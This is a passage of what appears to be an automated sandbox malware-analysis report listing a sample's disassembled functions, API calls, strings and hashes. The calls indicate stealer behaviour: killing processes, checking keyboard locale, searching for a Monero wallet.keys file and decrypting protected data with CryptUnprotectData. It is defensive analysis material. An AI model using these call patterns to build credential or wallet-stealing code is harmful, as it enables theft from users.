                                    • Opcode Fuzzy Hash: 562fdb64f31454ec0821a3eb9203794b0e07d2a2f5367ad5d5cd573797371cd9
                                    • Instruction Fuzzy Hash: F991F172A105049BCB26FB74DD96DED737DABD4300F00C5A9F90B9A185EE349B48CB92
                                    Function 007B4C9B Relevance: 13.0, Strings: 9, Instructions: 1746COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: "E$;G7)$;Y{n$Pai$S!?v$WM$bz^$iPLq$=
                                    • API String ID: 0-3350677368
                                    • Opcode ID: 848a6a41a3e8b42dd1094badb67e77bca15df2ea53f7f78114402c657d4b4197
                                    • Instruction ID: fec2a41f34869d224cc580b41f58f277761fefa9528d779dda2355f8e60bf092
                                    • Opcode Fuzzy Hash: 848a6a41a3e8b42dd1094badb67e77bca15df2ea53f7f78114402c657d4b4197
                                    • Instruction Fuzzy Hash: DEB239F360C2049FE308AE2DEC8567AFBE9EF94720F1A493DE6C5C3744E97558018696
                                    Function 003798E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00379905
                                    • Process32First.KERNEL32(00369FDE,00000128), ref: 00379919
                                    • Process32Next.KERNEL32(00369FDE,00000128), ref: 0037992E
                                    • StrCmpCA.SHLWAPI(?,00369FDE), ref: 00379943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0037995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0037997A
                                    • CloseHandle.KERNEL32(00000000), ref: 00379987
                                    • CloseHandle.KERNEL32(00369FDE), ref: 00379993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: eb57ffb3332fc9c69dbdb8a0c8c5d3e311a244465d1e308c1f0a28227fb9c9f9
                                    • Instruction ID: e29a27331390753ea7b29093219900412ab7c29d5172950c51405d98f0f4387b
                                    • Opcode Fuzzy Hash: eb57ffb3332fc9c69dbdb8a0c8c5d3e311a244465d1e308c1f0a28227fb9c9f9
                                    • Instruction Fuzzy Hash: FC112EB5A04208ABDB34DFA0DC48BDEB7B9BB49700F0095CCF609A6240DB749B84DF90
                                    Function 00377D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,003805B7), ref: 00377D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00377D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00377D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00377DF2
                                    • LocalFree.KERNEL32(00000000), ref: 00377EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: f27fb24ce596b9f151bbc7abf32461e7340bfa00e331e5b9669b63aa9eed53ac
                                    • Instruction ID: eafe9d8dd0a03e8a01a29bcb39f2a526120848deb8ac2b94f02b1e277427aa5b
                                    • Opcode Fuzzy Hash: f27fb24ce596b9f151bbc7abf32461e7340bfa00e331e5b9669b63aa9eed53ac
                                    • Instruction Fuzzy Hash: 0B414D71940218ABDB35DB94DC99BEEB379FB44700F2081D9E00A66590DB782F84CFA1
                                    Function 0036E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00380D79), ref: 0036E5A2
                                    • StrCmpCA.SHLWAPI(?,003815F0), ref: 0036E5F2
                                    • StrCmpCA.SHLWAPI(?,003815F4), ref: 0036E608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036ECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 6df86099f87d486f4cc9e5acdf8f79f2cc3f125496d1dc535ec05b3cdd66d99b
                                    • Instruction ID: d7b3a022a75ee744ad33dab8f7c92cc87442dfe80ff89b312675dbd13a98beff
                                    • Opcode Fuzzy Hash: 6df86099f87d486f4cc9e5acdf8f79f2cc3f125496d1dc535ec05b3cdd66d99b
                                    • Instruction Fuzzy Hash: 89124372A105189BCB26FB60DDA6EED7379AF94300F4085E9B50F5A091EF346B48CF52
                                    Function 007B68F5 Relevance: 9.1, Strings: 6, Instructions: 1596COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: D{$om$<rYh$aU=o$l`QU$tJ7W
                                    • API String ID: 0-470088399
                                    • Opcode ID: a5ea4ef3d5c8add6c825cc8f11b3b6b0495d9d19dd36472670440d26e217e82d
                                    • Instruction ID: 26dfb20337a923c209b399930b5c40ec91f950987cf4c38c7bf15afbdb5abfd6
                                    • Opcode Fuzzy Hash: a5ea4ef3d5c8add6c825cc8f11b3b6b0495d9d19dd36472670440d26e217e82d
                                    • Instruction Fuzzy Hash: FEB2E8F360C204AFE3046E2DEC8567AFBEAEFD4720F1A453DE6C487744EA3558058696
                                    Function 0036A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00364F3E,00000000,?), ref: 0036A251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A27A
                                    • LocalFree.KERNEL32(?,?,?,?,00364F3E,00000000,?), ref: 0036A28F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: >O6
                                    • API String ID: 4291131564-1777326043
                                    • Opcode ID: fb802b3db1ba6920c74e2d0f89f346ebd45e4c84780c6eae3b1f02eb84d94a4e
                                    • Instruction ID: e1cdf650999cd1ee374e53736918a4a3a677ad9638eb220452d53e7fd9da13bd
                                    • Opcode Fuzzy Hash: fb802b3db1ba6920c74e2d0f89f346ebd45e4c84780c6eae3b1f02eb84d94a4e
                                    • Instruction Fuzzy Hash: D611A4B4644308AFEB11CF64CC95FAA77B5EB89B10F208458FD159B390C772AA41CB90
                                    Function 007BD4EF Relevance: 7.9, Strings: 5, Instructions: 1605COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <l?]$N?_$wPb]$.|k$uJ
                                    • API String ID: 0-816137828
                                    • Opcode ID: 339bbb5438a3ed960eed5cb0388d8783ee89ea156c7ce288ce66d9433e664e94
                                    • Instruction ID: e657af983781542db0641b5c8d44422f67da0d607f9553dc368b8342e13af355
                                    • Opcode Fuzzy Hash: 339bbb5438a3ed960eed5cb0388d8783ee89ea156c7ce288ce66d9433e664e94
                                    • Instruction Fuzzy Hash: B3B2F7F360C204AFE3046E2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058696
                                    Function 003CF8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: 59d264ad8734ec4fdc756d73e37bc7a08f578193bce3febae78c91772e76d654
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: 68418E12E19BC9C5CB068B7444A02AEBFB22FD6210F6E42AEC49D5F782C774454AD3A5
                                    Function 0036C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0036C971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0036C97C
                                    • lstrcat.KERNEL32(?,00380B47), ref: 0036CA43
                                    • lstrcat.KERNEL32(?,00380B4B), ref: 0036CA57
                                    • lstrcat.KERNEL32(?,00380B4E), ref: 0036CA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 6cbd0ca4ff50c1e1c5ca5f00127b208499f94ae5e7761af93d102b107275b6d7
                                    • Instruction ID: 67d8cca217b98fe79c1b1164d6cc845c4269cb7f946230a9ae7a04a0101b3e19
                                    • Opcode Fuzzy Hash: 6cbd0ca4ff50c1e1c5ca5f00127b208499f94ae5e7761af93d102b107275b6d7
                                    • Instruction Fuzzy Hash: 25415EB590421EDBDB20DFA0DD89BFEB7B9AB48304F1051A8E509A7280D7745B84CF91
                                    Function 003672A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003672AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003672B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003672E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00367304
                                    • LocalFree.KERNEL32(?), ref: 0036730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 15d2172672bf416ce93db8bece9242f7e001a773032af7b747fc026e23e0c394
                                    • Instruction ID: 089ac1b19aaa7e7ce2012c7ece226e7d03400dfa26da24c83f83a4ab238fb82c
                                    • Opcode Fuzzy Hash: 15d2172672bf416ce93db8bece9242f7e001a773032af7b747fc026e23e0c394
                                    • Instruction Fuzzy Hash: AF0112B5A44308BBDB14DFE4DC46F9E7779EB44B04F108544FB05AB2C0D6B0AA009B94
                                    Function 00379790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003797AE
                                    • Process32First.KERNEL32(00380ACE,00000128), ref: 003797C2
                                    • Process32Next.KERNEL32(00380ACE,00000128), ref: 003797D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 003797EC
                                    • CloseHandle.KERNEL32(00380ACE), ref: 0037980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
